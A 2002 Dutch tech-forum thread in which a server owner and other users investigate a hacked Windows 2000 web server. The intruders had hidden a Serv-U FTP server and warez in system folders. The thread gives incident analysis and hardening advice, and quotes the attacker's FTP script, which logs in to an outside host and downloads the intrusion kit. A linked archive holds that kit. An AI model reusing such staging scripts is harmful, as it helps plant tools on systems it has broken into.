Toon posts:

[W2KServer] Gehacked... Wat nu...

Pagina: 1
Acties:
  • 186 views sinds 30-01-2008

woensdag 23 oktober 2002 17:59

Acties:
  • 0 Henk 'm!
  • Kama
  • Registratie: Mei 2002
  • Laatst online: 30-06 10:52

Kama

Game Coordinator

Topicstarter
Tot m'n eigen schande en met schaamrood op de kaken heb ik vandaag moeten concluderen dat m'n W2K webserver gehacked is :-( Ik heb het ding nu zo 3 jaar omhoog en dit is me nog niet eerder overkomen :-(

Maar nu is het zaak om te achterhalen wat er precies gebeurd is. Ik ondekte (nadat m'n ISP had gewaarschuwd voor wel ERG veel traffic) dat in de afgelopen 4 dagen een totaal van 250GB verkeer heeft plaatsgevonden. Samen met m'n ISP heb ik allerlei services uitgeschakeld en bekeken wanneer het verkeer wegviel.

Na het uitschakelen van service "Windows Time" met als description "ice" (Dus niet "Windows Timer", wat een echte service is) dropte de netwerkbelasting van een dikke 5000 kbit/sec naar ca 90kbit/sec. Deze service verwees naar een applicatie genaamd C:\WinNT\Tasks\Desktop\timer.exe ...

Verder bleek er in de systeemfolder "System Volume Information" (die alleen toegankelijk stond voor SYSTEM) een dikke 8Gb aan MP3's, Films, Porno en illegale software te staan.

Kosten: 250GB nagecalculeerd verkeer... = vele honderden euro's :( :(

Nu wil ik graag weten hoe ze dit hebben geflikt... Ik heb ISA vrij aardig draaien dacht ik zelf, Exchange dichtgetimmerd, geen overbodige services, geen anonieme FTP, geen Webproxy (ook niet in ISA dus), geen Socks... Hoe doen ze dit?

Ik heb vandaag een aantal openstaande security fixes geinstalleerd en er ook maar meteen SP3 opgekwakt... Zijn er mensen vulnerabilities bekend die hierop duiden??

Ohja... Google is geen hulp ... zoeken op "Windows Time", of "timer.exe" is iets te algemeen....

drs. Kama

woensdag 23 oktober 2002 18:03

Acties:
  • 0 Henk 'm!
  • Semt-x
  • Registratie: September 2002
  • Laatst online: 22:03

Semt-x

Lockdown tool van MS gebruiken.
Server extensies uitzetten. dan ben je al een heel eind.

woensdag 23 oktober 2002 18:15

Acties:
  • 0 Henk 'm!
  • Battle Bunny
  • Registratie: Oktober 2001
  • Laatst online: 29-06 20:44

Battle Bunny

Misschien helpt het om alle poorten aan je internet interface dicht te zetten d.m.v. "local security policy" (behalve die die je echt nodig hebt)?

edit:

Kan het zijn dat je Terminal Services of Telnet server aan had?

woensdag 23 oktober 2002 18:19

Acties:
  • 0 Henk 'm!
  • ]Byte[
  • Registratie: April 2000
  • Laatst online: 13-09-2020

]Byte[

win2k...... was daar inmiddels al niet een hogere sp voor uitgekomen?
SP's en updates (of eerder het ontbreken ervan) blijken keer op keer het probleem van een gehackte slachtoffer te zijn....
Troost je, je bent niet de eerste en zeker niet de laatste!
Gartner heeft er al eens een artikel over geschreven, coclusie was (in grote lijnen) dat dat oa. komt dat beheerders een beetje patch-moe worden van MS en het dan maar wel eens acheterwege willen laten om zo alles in 1 keer te doen...... (maarja... wachten=potentioneel slachtoffer)
Moet wel zeggen, dat het op zich wel netjes van je provider is om er ff achteraan te bellen....
Maar welke provider geeft jou trouwens een trafic van 5Mbit???
Jaja, ik weet 't, een downstream met ADSL van je tot 8Mbit, maar er staat bij jou "maar" 8GB op dus moet het overgrote deel bestaan uit upstream trafic, en das ook met ADSL bij 1,5 Mbit afgelopen.
Ik weet 't, niet echt van belang maar was er wel ff benieuwd naar.

woensdag 23 oktober 2002 18:20

Acties:
  • 0 Henk 'm!
  • Battle Bunny
  • Registratie: Oktober 2001
  • Laatst online: 29-06 20:44

Battle Bunny

oudakker: in princiepe moet je redelijk veilig zijn als je alles dicht hebt + alle patches. Dan is volgens mij SP3 niet eens nodig (die heb ik liever toch al niet, ivm al die onzin die naar MS verzonden word)

woensdag 23 oktober 2002 18:25

Acties:
  • 0 Henk 'm!
  • LauPro
  • Registratie: Augustus 2001
  • Laatst online: 13-09 20:47

LauPro

Prof Mierenneuke®

Sjah, sommigen zeggen maar dat Windows 2000 dé software is maar ik zou toch maar echt is gaan kijken naar Windows .NET Server. Ik geloof best dat je Windows 2000 veilig kan maken maar dannog.

Dat bestand timer.exe zegt natuurlijk helemaal _niks_. Als je het bestand ff naar me stuurt kan ik kijken wat die doet. En als je hem hebt verwijderd ben je dom bezig geweest (sorry)...

Maar ff wat anders; zou het te maken hebben gehad met die DDoS attack? (zie FP)

Inkoopacties - HENK terug! - Megabit
It is a war here, so be a general!

woensdag 23 oktober 2002 18:32

Acties:
  • 0 Henk 'm!
  • DiedX
  • Registratie: December 2000
  • Laatst online: 14-09 09:51

DiedX

Dit klinkt inderdaad als een IIS hack.
Zoals ze zeggen: Uithuilen, formatteren, en opnieuw beginnen. Daarna direct SP3 en lockdown gebruiken.
Tip: doe dat vanachter een firewall, ik heb een keer meegemaakt dat ik al Red Alert kreeg tijdens het patchen.

DiedX supports the Roland™, Sound Blaster™ and Ad Lib™ sound cards

woensdag 23 oktober 2002 18:33

Acties:
  • 0 Henk 'm!
  • Dethroned
  • Registratie: Augustus 2001
  • Laatst online: 14-05 14:50

Dethroned

Liev

Je had geen tooltje aanstaan om te kijken wel progje uberhaupt connectie had tot het internet ??? Beetje jammer en niet handig. BTW als je 250 GB hebt gedownt in 4 dagen ? dat is wel hel 71 kb/sec. en dat terwijl je een 5mbit lijn hebt.... Is dat echt zo'n probleem voor die ISP. En toont die dan helemaal geen begrip.
Lees net verkeerd dat het dataverkeer is maar dan nog ....
en 8GB aan data naar 4 dagen en je krijgt gelijk een waarschuwing ?
Ben ook idd benieuwd naar de provider die je hebt.

I got a problem-solver and its name is revolver

woensdag 23 oktober 2002 18:49

Acties:
  • 0 Henk 'm!
  • vassago
  • Registratie: Januari 2000
  • Laatst online: 19:49

vassago

Dethroned schreef op 23 oktober 2002 @ 18:33:
Je had geen tooltje aanstaan om te kijken wel progje uberhaupt connectie had tot het internet ??? Beetje jammer en niet handig. BTW als je 250 GB hebt gedownt in 4 dagen ? dat is wel hel 71 kb/sec. .
710KB/s bedoel je hoop ik :?

Gooi die executable eens in Notepad, vaak kun je daar hele leuke dingen uit halen.
(Of mail hem even, ben nu wel nieuwsgierig ;) )

woensdag 23 oktober 2002 22:06

Acties:
  • 0 Henk 'm!
  • Kama
  • Registratie: Mei 2002
  • Laatst online: 30-06 10:52

Kama

Game Coordinator

Topicstarter
Ik heb van W2K Server en alle opties net netjes alle licenties gekocht, dus upgraden zit er even niet meer in :-/ Bovendien koop ik niks meer van MS vóór SP1 uit it :p

Mijn grote fout was het schijnbaar om niet alle security patches geinstalleerd te hebben *zucht*... Ironisch. Ik betaal me een deuk voor de MS licenties en kom er op een moment als dit achter dat er allemaal patches zijn. Ik heb ook RedHat geinstalleerd (probeer m'n blik te verruimen) en daar krijg ik voor nop alle warnings toegemaild.


Enfin. Ik heb nog even doorgespeurd. Dit is volgens mij wat er gebeurd is.

Op de 1 of andere manier (netbios staat uiteraard allang uit) heeft men de Scheduled Task folder van de server kunnen benaderen. (Vulnerability?). Dit is frappant, want als ik me goed herinner is dit 1 van de folders die 2000/XP systemen ook laten zien als je geen disks geshared hebt. (of verzin ik dit nu?)

Wellicht omdat het niet mogelijk is om in deze c:\winnt\tasks files te zetten is daar een folder "desktop" ingemaakt. Deze is niet te zien of te maken via de explorer, maar in een command box kun je gewoon een folder maken. Met "dir" is deze niet te zien, maar met cd kun je er gewoon in.

En voila. Er was een folder desktop en er is daar een mini-installatie van ServU geinstalleerd. Deze runde op poort 20000 en 43nogwat. Wellicht heeft met op dezelfde handige wijze een voorgebakken Task-file geupload die vervolgens die server heeft gestart.

Voor de liefhebber wil ik graag deze folder "desktop" en subdirs beschikbaar stellen.

Gelukkig is de rest van m'n systeem niet geschonden, dus een reinstall acht ik voorlopig niet nodig (wel ffkes alles nogmaal gebackupped). Het verkeer is vooralsnog ook naar normaal gegaan.

Ik ga lockdown es bekijken, en ISA aanscherpen... Ik moet daar wel mee uitkijken, want 1 klik teveel en ik kan een flink eind rijden :)

En voor de ISP... tja... 250GB = 250GB... Gelukkig ontvang ik wat donaties van m'n bezoekers....

drs. Kama

woensdag 23 oktober 2002 22:09

Acties:
  • 0 Henk 'm!
  • BlaTieBla
  • Registratie: November 2000
  • Laatst online: 17:54

BlaTieBla

Vloeken En Raak Schieten

offtopic:
Ach... je hoeft nu zelf niet meer te zoeken naar al die mp3-tjes en pr0n. Dat is natuurlijk ook wel wat geld waard :)

leica - zeiss - fuji - apple | PSN = Sh4m1n0

woensdag 23 oktober 2002 22:11

Acties:
  • 0 Henk 'm!
  • F_J_K
  • Registratie: Juni 2001
  • Niet online

F_J_K

Moderator CSA/PB

Front verplichte underscores

Doe die desktop folder maar zonder de warez trouwens ;) :+

Een clean reinstall lijkt me trouwens toch wel verstandig, je weet vast niet 100% zeker dat er niets extra's is geinstalleerd op de machine. Dan lockdown draaien is zeker een goed idee; een image maken voor je erg gaat sleutelen kan geen kwaad trouwens; datzelfde zou ik na de volgende install ook doen; scheelt voortaan wat werk als je je server opeens snel weer online moet krijgen.

Mailtjes bij patches kan voor jouw systeem trouwens ook best :)

'Multiple exclamation marks,' he went on, shaking his head, 'are a sure sign of a diseased mind' (Terry Pratchett, Eric)

woensdag 23 oktober 2002 22:26

Acties:
  • 0 Henk 'm!
  • Kama
  • Registratie: Mei 2002
  • Laatst online: 30-06 10:52

Kama

Game Coordinator

Topicstarter
BlaTieBla schreef op 23 oktober 2002 @ 22:09:
offtopic:
Ach... je hoeft nu zelf niet meer te zoeken naar al die mp3-tjes en pr0n. Dat is natuurlijk ook wel wat geld waard :)
Voor dat geld had ik hier op de wallen "the real thing" kunnen hebben ;(

De warez zaten trouwens in de System Volume Information folder. Dat is een systeemfolder waar ik in eerste instantie niet inkon. Derhalve wordt de inhoud van deze folder ook niet meegeteld als je Select All doet en dan Properties vraagt. En ik vond het al vreemd dat alle files tezamen volgens Explorer ca 4 GB waren, terwijl er Explorer ook weer wist te vertellen dat de Disk Usage: 12 GB was....

pas door ChkDsk in een commandbox te runnen kwam ik erachter dat er 8GB in de vorm van 1000 files extra op de schijf stonden die niet werden meegeteld.

Pas toen ben ik alle systeemfolders af gaan lopen en mezelf toegang verschaft tot deze SVI folder... en daar stond een paar subfolders diep inderdaad een mooi opgestelde warez site... :/

drs. Kama

woensdag 23 oktober 2002 22:33

Acties:
  • 0 Henk 'm!
  • Kama
  • Registratie: Mei 2002
  • Laatst online: 30-06 10:52

Kama

Game Coordinator

Topicstarter
Excuses, als ik beter opgelet had, had dit ook in 1 bericht gekund... mgoed.
F_J_K schreef op 23 oktober 2002 @ 22:11:

Mailtjes bij patches kan voor jouw systeem trouwens ook best :)
Jah?? Graag! Hoe?

Ik weet wel dat MS zo'n fijne update alerter heeft, maar dan moet je een MS proggie resident geladen hebben... En daar houd ik niet van. Niet van MS en niet op een server.

drs. Kama

woensdag 23 oktober 2002 22:47

Acties:
  • 0 Henk 'm!
  • F_J_K
  • Registratie: Juni 2001
  • Niet online

F_J_K

Moderator CSA/PB

Front verplichte underscores

http://www.microsoft.com/...hnet/security/current.asp ->
http://www.microsoft.com/...urity/bulletin/notify.asp
http://online.securityfocus.com/archive -> bugtraq
En zo zijn er nog wat mailinglists van bedrijven.

(Anderen weten de mailing lists beter dan ik gok ik :P)

'Multiple exclamation marks,' he went on, shaking his head, 'are a sure sign of a diseased mind' (Terry Pratchett, Eric)

woensdag 23 oktober 2002 22:50

Acties:
  • 0 Henk 'm!
  • Kama
  • Registratie: Mei 2002
  • Laatst online: 30-06 10:52

Kama

Game Coordinator

Topicstarter
Dank dank... Ik ga me nu meteen abboneren. Hoewel ik een Windows-er in hart en nieren ben en ik pas een paar maandjes Linux aan het bekijken ben vond ik het stijlvol van RH dat ik daar automatisch mail van kreeg.

Ik wil dit liever niet nogmaals meemaken :-)

drs. Kama

woensdag 23 oktober 2002 23:02

Acties:
  • 0 Henk 'm!

Verwijderd

Wat ik niet snap van al dit soort topics is mensen het maar over firewalls hebben.

Snapt nu niemand dat dit met een eenvoudig virusscannertje gewoon tegen te houden is?
Akkoord met een firewall gooi je zaken dicht die bijvoorbeeld trojans toestaan, hetgeen ook weer op te lossen is met een virusscannertje.

Dit virus heb je gewoon zelf binnengehaald en omdat het gewoon de normale userpoorten gebruikt van binnenuit zal je 'firewall' hier echt nix aan doen.

Gewoon virusscannertje firewall eraf (je zegt dat je hem 'aardig' geconfigureerd hebt, dus het werkt niet volledig) en alle problemen zijn opgelost. Ohwja wel even netbios poortje uitzetten. KLAAR!!!

Waarom niet werken met een simpel firewalltje van een een-of-ander merk? Goedkoop en werkt toch echt beter. Is in iedergeval te snappen voor mensen die even een firewall willen hebben.

woensdag 23 oktober 2002 23:12

Acties:
  • 0 Henk 'm!
  • DJSmiley
  • Registratie: Mei 2000
  • Laatst online: 22:59

DJSmiley

Verwijderd schreef op 23 oktober 2002 @ 23:02:
Wat ik niet snap van al dit soort topics is mensen het maar over firewalls hebben.

Snapt nu niemand dat dit met een eenvoudig virusscannertje gewoon tegen te houden is?
Akkoord met een firewall gooi je zaken dicht die bijvoorbeeld trojans toestaan, hetgeen ook weer op te lossen is met een virusscannertje.

Dit virus heb je gewoon zelf binnengehaald en omdat het gewoon de normale userpoorten gebruikt van binnenuit zal je 'firewall' hier echt nix aan doen.

Gewoon virusscannertje firewall eraf (je zegt dat je hem 'aardig' geconfigureerd hebt, dus het werkt niet volledig) en alle problemen zijn opgelost. Ohwja wel even netbios poortje uitzetten. KLAAR!!!

Waarom niet werken met een simpel firewalltje van een een-of-ander merk? Goedkoop en werkt toch echt beter. Is in iedergeval te snappen voor mensen die even een firewall willen hebben.
Mjah.. ik volg je niet helemaal, maar 't is niet ff iets van een viruskenner.. dit is gewoon een bugje in IIS, SQL of whatever-what.
Daardoor heb je (waarschijnlijk) in no-time of een root-passwrd, of dostoegang op die bak. en als je eenmaal dos toegang hebt (desnoods via een vuln zoals de unicode bug) is het HEEEL simpel om er ff een exe heen te tFTPen die de rest ook openzet.
dan ff serv-u configgen, et voila: je pubstro is klaar om gefilled te worden en op een board te verschijnen....

't is en blijft een kwestie van patchen.

Een firewall heb ik er zelf ook achter, ook alle niet-gebruikte poorten staan dicht. Mochten ze dan toch op een of andere manier binnenkomen, dan kan er iig al geen pubstro draaien, poorten zijn geblocked ;)

woensdag 23 oktober 2002 23:13

Acties:
  • 0 Henk 'm!
  • Rukapul
  • Registratie: Februari 2000
  • Laatst online: 00:17

Rukapul

Heeft die kleine serv-u geen logging informatie achter gelaten? Wellicht is het namelijk wel leuk om op basis van de logs ISPs te benaderen en zodoende de misbruikers aan te schrijven / aangifte te doen (eigenlijk alleen zinvol / leuke exercitie indien het Nederlanders zijn).

Wellicht dat je je in de toekomst moet abonneren op de MS security lijst. Ook het draaien van zo'n hotfix test tooltje kan helpen (zie de MS security site). Bovendien alle poorten expliciet dichtgooien in de firewall voorkomt dat er iets anders dan poort 80, etc. open staat.
Verwijderd schreef op 23 oktober 2002 @ 23:02:
...
Dit virus heb je gewoon zelf binnengehaald en omdat het gewoon de normale userpoorten gebruikt van binnenuit zal je 'firewall' hier echt nix aan doen.
...
Of dit is een troll, of je ziet de splinter niet meer door de enorme balk. (Topicstarter heeft de vermoedelijke oorzaak hierboven al uit de doeken gedaan.

woensdag 23 oktober 2002 23:16

Acties:
  • 0 Henk 'm!
  • KaMiKaZe
  • Registratie: Mei 2000
  • Laatst online: 05-08 20:22

KaMiKaZe

Ik begrijp niet dat providers niet automatisch een stop zetten op een server als blijkt dat er zoveel data over een lijn heen flopt dat het onmogelijk van een website kan komen.
dat zou een hoop ellende besparen.

Je bent het slachtoffer geworden van een iis scanner/hacker in de fxp scene
die scanned op bepaalde exploids en start dan zelf een ftp service die hem vervolgens
alle rechten geeft op jou machine :(

Humanity is acquiring all the right technology for all the wrong reasons.

woensdag 23 oktober 2002 23:26

Acties:
  • 0 Henk 'm!

Verwijderd

Staat er een virusscanner op?!?!?
Is deze volledig up to date??
Is netbiospoort dicht??

1 keer nee? U gaat niet door voor de koelkast ;-)

woensdag 23 oktober 2002 23:31

Acties:
  • 0 Henk 'm!
  • jep
  • Registratie: November 2000
  • Laatst online: 13-09 23:13

jep

[quote]Verwijderd schreef op 23 oktober 2002 @ 23:26:
Staat er een virusscanner op?!?!?
Is deze volledig up to date??
Is netbiospoort dicht??
quote]
There he is; the win2k secure guide :{.

woensdag 23 oktober 2002 23:44

Acties:
  • 0 Henk 'm!
  • P5ycho
  • Registratie: Januari 2000
  • Laatst online: 21:22

P5ycho

Verwijderd schreef op 23 oktober 2002 @ 23:26:
Staat er een virusscanner op?!?!?
Is deze volledig up to date??
Is netbiospoort dicht??

1 keer nee? U gaat niet door voor de koelkast ;-)
lees de thread eens aub, sjongejonge...

12x 280Wp ZW, 12x 280Wp ZO, Zubadan SHW80YAA 8kW, Zehnder Q450 ERV

woensdag 23 oktober 2002 23:53

Acties:
  • 0 Henk 'm!
  • vassago
  • Registratie: Januari 2000
  • Laatst online: 19:49

vassago

"Never underestimate the power of stupid people."

Hmm, heeft dit iets met de topicstarter te maken? ;)
<bukt>

Wat ik niet snap, je hebt ISA draaien dus alle poorten dicht behalve degene die je gebruikt.
Gebruik je 4000 en die 43nogwat ergen voor dan?

Ook een idee is om alle tools (cmd, regedit e.d.) alleen toegankelijk te maken voor administrators. Hackers krijgen via buffer overflows e.d. vaak System toegang als je deze tools afschermt wordt het al moeilijker voor de standaard hack-tools.
(Of zet de tools in een andere dir zodat c:\winnt\system32\cmd.exe niet werkt)

donderdag 24 oktober 2002 00:07

Acties:
  • 0 Henk 'm!

Verwijderd

Zoek ook altijd tftp.exe en ftp.exe op en delete/remove/rename die ff. Het is dan al veel moeilijker om files op je compu te krijgen (zoals servu dus...).

Verder zou ik toch echt ff formatteren, je weet maar nooit welke tools er nog op staan...

Ook is een firewall zoals zonealarm ook een goede tool want als dat erop had gestaan had je eerst op ok moeten drukken (ofzo) voordat servu pas het inet op mocht...

donderdag 24 oktober 2002 00:16

Acties:
  • 0 Henk 'm!
  • Kama
  • Registratie: Mei 2002
  • Laatst online: 30-06 10:52

Kama

Game Coordinator

Topicstarter
Verwijderd schreef op 23 oktober 2002 @ 23:02:
...
Gewoon virusscannertje firewall eraf (je zegt dat je hem 'aardig' geconfigureerd hebt, dus het werkt niet volledig) en alle problemen zijn opgelost. Ohwja wel even netbios poortje uitzetten. KLAAR!!!

Waarom niet werken met een simpel firewalltje van een een-of-ander merk? Goedkoop en werkt toch echt beter. Is in iedergeval te snappen voor mensen die even een firewall willen hebben.
1. Een gewoon virusscannertje installeer niet op Windows Server. Die willen alleen op Workstation/Pro installeren. Een server virusscanner is een paar (lees: veel) slagen duurder en een veel grotere stap om aan te schaffen en te gebruiken.

2. Ik gebruik de server nergens voor, behalve om te serven. Dus ik haal er geen mail mee op, ik surf er niet mee. Kans dat een virus dus binnengehaald wordt en het systeem besmet raakt acht ik behoorlijk klein. Als ik iets over het hoofd zie, hoor ik dat graag.

3. Hetgeen dat kwaad deed was een leak (wat ik vermoed). Dit spoort een virusscanner niet op. Wat men daarna deed is ServU installeren, en dat via gewoon doorsnee reskit tools als service op de server opstarten, ook dit is niet iets wat met een virusscanner gevonden zal worden.

Maw, ik snap je reactie niet helemaal...

edit:
: Ik lees dat er al meer mensen het niet snapten

Overigens: Ik heb geen anon FTP server, ServU stond niet op m'n server. Ik heb de IIS FTP server aanstaan met authenticatie. Deze FTP server logt netjes en is niet gebruikt.

drs. Kama

donderdag 24 oktober 2002 00:26

Acties:
  • 0 Henk 'm!
  • Kama
  • Registratie: Mei 2002
  • Laatst online: 30-06 10:52

Kama

Game Coordinator

Topicstarter
Voor de liefhebbers. Dit is de subdir desktop uit C:\WINNT\TASKS

http://www.playteq.com/hackers.rar

btw, Goede tip om de meestgebruikte tools zoals ftp.exe etc. te renamen.

drs. Kama

donderdag 24 oktober 2002 00:26

Acties:
  • 0 Henk 'm!
  • jep
  • Registratie: November 2000
  • Laatst online: 13-09 23:13

jep

Wat is de grap van een dure en belastende virus-scanner op een windows internet-server? Ik ga er vanuit dat je er niet op werkt/surft/emailed en je patches hebt geinstalleerd. Een virus-scanner is dan alleen maar een onnodige-belasting lijkt me.

Firewall is imo ook alleen een handige oplossing als je specifieke hosts wil restricten op access, maar over 't algemeen moet je gewoon zo min mogelijk (en alles gepatched) open gooien naar wens.

donderdag 24 oktober 2002 00:29

Acties:
  • 0 Henk 'm!
  • jelmervos
  • Registratie: Oktober 2000
  • Niet online

jelmervos

Simple user

Had een goed geconfigureerde firewall dit dan niet (deels) kunnen voorkomen? Het had je iig geld kunnen besparen toch?

"The shell stopped unexpectedly and Explorer.exe was restarted."

donderdag 24 oktober 2002 01:05

Acties:
  • 0 Henk 'm!
  • Kama
  • Registratie: Mei 2002
  • Laatst online: 30-06 10:52

Kama

Game Coordinator

Topicstarter
Delphi schreef op 24 oktober 2002 @ 00:29:
Had een goed geconfigureerde firewall dit dan niet (deels) kunnen voorkomen? Het had je iig geld kunnen besparen toch?
Ja. Wellicht wel. Dan waren die poorten wellicht niet toegankelijk geweest. Ik heb het echt fijn afsluiten met ISA een beetje uitgesteld, omdat ik bang was m'n remote access af te sluiten en dus naar A'dam-Z te moeten om met 2 klikjes m'n remote access poort weer aan te zetten. Over duur gesproken :)

Aan de andere kant, wie weet hadden ze dan ook wel m'n mailserver kapot gemaakt, of een andere service en het op die poort gerund. Ik weet het niet.

drs. Kama

donderdag 24 oktober 2002 01:28

Acties:
  • 0 Henk 'm!
  • Kama
  • Registratie: Mei 2002
  • Laatst online: 30-06 10:52

Kama

Game Coordinator

Topicstarter
Ik heb het volgende scriptje gevonden (zit ook in hackers.rar zag ik net), genaamd fpt.txt:

o 62.xxx.x.xx 20000
Insane
Insane
lcd \WINNT\Tasks\desktop
mget *.*
quit

Dus inderdaad... ze hebben m'n eigen FTP.exe gebruikt om de hele zooi erop te knallen. Nou dankzij de tip om fpt.exe te renamen is dat een stuk lastiger geworden.

Dit FTP adres is van een NL-bedrijf. Ik ga ze morgen om medewerking vragen. Ik neem tenminste aan dat ze dit niet zelf op hun geweten hebben.

[ Voor 0% gewijzigd door Kama op 24-10-2002 14:10 . Reden: De aardige mensen van dit IP nummer waren er niet zo blij mee dat ik dat hier vertelde ]

drs. Kama

donderdag 24 oktober 2002 08:55

Acties:
  • 0 Henk 'm!
  • Rudie_V
  • Registratie: April 2000
  • Laatst online: 22-06 21:30

Rudie_V

Mijn netwerkje zit achter een nat router en firewall. Verder draai ik op de pc's zelf nog een personal firewall. Als er een onbekend programmaatje het netwerk op wil moet ik dus eerst toestemming geven(zoals hierboven ook al aangegeven is, ik gebruik Tiny). Dit had al voorkomen dat ServU het netwerk had opgekunt. Verder vraag ik me af waarom dat hoge gebruikte poortnummer open staat. Neem aan dat alles eerst dicht stond en dat je daarna wat poorten open ben gaan zetten, zo zet je alleen open wat je nodig heb en voorkom je dat onnodig poorten open staan...desnoods eerst thuis testen welke poorten bepaalde tools gebruiken(kan weer mooi met je personal firewall), zoals voor je remote access programma. Verder zou ik als je weet wat en hoe ze het gedaan hebben toch een nieuwe installatie doen.

donderdag 24 oktober 2002 11:38

Acties:
  • 0 Henk 'm!
  • ShadowrunR
  • Registratie: Maart 2002
  • Laatst online: 18-05 20:55

ShadowrunR

Kama schreef op 24 oktober 2002 @ 01:05:
[...]


Ja. Wellicht wel. Dan waren die poorten wellicht niet toegankelijk geweest. Ik heb het echt fijn afsluiten met ISA een beetje uitgesteld, omdat ik bang was m'n remote access af te sluiten en dus naar A'dam-Z te moeten om met 2 klikjes m'n remote access poort weer aan te zetten. Over duur gesproken :)
Maar het was waarschijnlijk wel goedkoper gebleven dan nu :)
Nuja, een mens leert bij. Volgens mij gaat dit je geen 2de maal gebeuren ;)

donderdag 24 oktober 2002 12:19

Acties:
  • 0 Henk 'm!

Verwijderd

http://www.win2kwereld.nl...g%20internet%20info.shtml (IIS BEVEILIGING)

http://www.sans.org/top20/#index (top 20 beveiligingslekken en hoe te handelen)

Verder: zwaar k*t zoon hack maar aan de andere kant ook weer leerzaam....

Nog verder:
a) hernoem het administrator account
b) maak een ander account aan met God-rechten
c) haal je shares weg :) (c$ enz)
d) geef rechten op alle files en folders op het nieuwe God account!!

Meer info: www.microsoft.com/technet...ist/iischk.asp?frame=true

Suc6

donderdag 24 oktober 2002 12:42

Acties:
  • 0 Henk 'm!

Verwijderd

Kama schreef op 24 oktober 2002 @ 00:16:
[...]


1. Een gewoon virusscannertje installeer niet op Windows Server. Die willen alleen op Workstation/Pro installeren. Een server virusscanner is een paar (lees: veel) slagen duurder en een veel grotere stap om aan te schaffen en te gebruiken.

2. Ik gebruik de server nergens voor, behalve om te serven. Dus ik haal er geen mail mee op, ik surf er niet mee. Kans dat een virus dus binnengehaald wordt en het systeem besmet raakt acht ik behoorlijk klein. Als ik iets over het hoofd zie, hoor ik dat graag.

3. Hetgeen dat kwaad deed was een leak (wat ik vermoed). Dit spoort een virusscanner niet op. Wat men daarna deed is ServU installeren, en dat via gewoon doorsnee reskit tools als service op de server opstarten, ook dit is niet iets wat met een virusscanner gevonden zal worden.

Maw, ik snap je reactie niet helemaal...

edit:
: Ik lees dat er al meer mensen het niet snapten

Overigens: Ik heb geen anon FTP server, ServU stond niet op m'n server. Ik heb de IIS FTP server aanstaan met authenticatie. Deze FTP server logt netjes en is niet gebruikt.
een mooie firewall Inclusief viruscanner hoeft niet duur te zijn... Iptables icm een of andere linux firewall kost je niks behalve dan een beetje tijd om je oude server te installeren... (je was toch al met redhat bezig :) )

donderdag 24 oktober 2002 12:49

Acties:
  • 0 Henk 'm!

Verwijderd

Rudie_V schreef op 24 oktober 2002 @ 08:55:
Mijn netwerkje zit achter een nat router en firewall. Verder draai ik op de pc's zelf nog een personal firewall. Als er een onbekend programmaatje het netwerk op wil moet ik dus eerst toestemming geven(zoals hierboven ook al aangegeven is, ik gebruik Tiny). Dit had al voorkomen dat ServU het netwerk had opgekunt. Verder vraag ik me af waarom dat hoge gebruikte poortnummer open staat. Neem aan dat alles eerst dicht stond en dat je daarna wat poorten open ben gaan zetten, zo zet je alleen open wat je nodig heb en voorkom je dat onnodig poorten open staan...desnoods eerst thuis testen welke poorten bepaalde tools gebruiken(kan weer mooi met je personal firewall), zoals voor je remote access programma. Verder zou ik als je weet wat en hoe ze het gedaan hebben toch een nieuwe installatie doen.
Rudie_V (Collega!)

De kloe van dit hele verhaal is dat er op de webserver van de topicstarter niet alle beschikbare security patches geinstalleerd waren. Als gevolg hiervan kon de machine ge-exploit worden.

En als een machine eenmaal ge-exploit is, tja, dan ben je hem eigenlijk gewoon kwijt. Simpel as that. Elk verkeer van binnen naar buiten is zowiezo met een NAT firewall meestal wel mogelijk (tenzij je je omgeving echt goed ingericht hebt, en je dus vanaf de webserver niet zèlf een sessie naar internet op kunt zetten).

Daar doet geen virusscanner of firewall wat aan. Je kunt uiteraard iets als een IDS gaan installeren, want zo'n systeem kan "malicious" URL's onderscheppen.

Ik heb weleens meegemaakt dat de eigenaar van de machine niet eens meer kon inloggen. De administrator was gerenamed en van een ander password voorzien...

donderdag 24 oktober 2002 14:12

Acties:
  • 0 Henk 'm!
  • Kama
  • Registratie: Mei 2002
  • Laatst online: 30-06 10:52

Kama

Game Coordinator

Topicstarter
Verwijderd schreef op 24 oktober 2002 @ 12:42:
[...]

een mooie firewall Inclusief viruscanner hoeft niet duur te zijn... Iptables icm een of andere linux firewall kost je niks behalve dan een beetje tijd om je oude server te installeren... (je was toch al met redhat bezig :) )
Serverversies zijn helaas vrij prijzig :( Ik ben er nog niet klaar voor om op Linux over te stappen, bovendien is m'n hele site in ASP/MSSQL met SP's. Maar goed. Ik leer bij.

drs. Kama

donderdag 24 oktober 2002 14:19

Acties:
  • 0 Henk 'm!

Verwijderd

Kama schreef op 24 oktober 2002 @ 14:12:
[...]


Serverversies zijn helaas vrij prijzig :( Ik ben er nog niet klaar voor om op Linux over te stappen, bovendien is m'n hele site in ASP/MSSQL met SP's. Maar goed. Ik leer bij.
overstappen?? alleen een router neerzetten met firewall heb ik het over hoor kan gewoon op een desktop draaien kan je een proxy installeren voor veiliger internet en een virusscanner op de firewall (packet filter) voor de rest draai je gewoon lekker iis ofzo op je server (port forwarding voor de benodigde poorten naar w2kserver)

donderdag 24 oktober 2002 14:50

Acties:
  • 0 Henk 'm!
  • Kama
  • Registratie: Mei 2002
  • Laatst online: 30-06 10:52

Kama

Game Coordinator

Topicstarter
Van de aardige mensen van dat IP die liever niet in de publiciteit willen komen uit dat scriptje heb ik begrepen dat het mogelijk via een gat in SQL Server is gegaan. Ze weten niet of dit gat al gedicht is, maar er is in ieder geval niet zoveel tegen dit soort lekken te doen.

Wel had poort 20000 gewoon dicht moeten zitten.

Inmiddels is m'n server zo ingesteld dat ie bij een traffic > 4000kbit/sec alarm slaat.

drs. Kama

donderdag 24 oktober 2002 14:54

Acties:
  • 0 Henk 'm!
  • aReaRe
  • Registratie: Juli 2001
  • Niet online

aReaRe

Welkom Patrick (11-02-2022) <3

Verwijderd schreef op 23 oktober 2002 @ 23:26:
Staat er een virusscanner op?!?!?
Is deze volledig up to date??
Is netbiospoort dicht??

1 keer nee? U gaat niet door voor de koelkast ;-)
1loeki1

Voordat je antwoordt geeft: lees deze eens |:(
- Windows Operated Systems - Policy

En deze zijn zeer handig

- http://gathering.tweakers...aq/forumgedrag#topicstart
- Algemene gedragsregels (Netiquette) #pre-topic
- Algemene gedragsregels (Netiquette) #pre-got

Renault Mégane Estate 1.3 TCe EDC (IV) 140pk Bose (oktober 2019) met aan de trekhaak een Caravelair Antares Titanium 390 (mei 2021)

donderdag 24 oktober 2002 16:36

Acties:
  • 0 Henk 'm!
  • weerdo
  • Registratie: December 2000
  • Niet online

weerdo

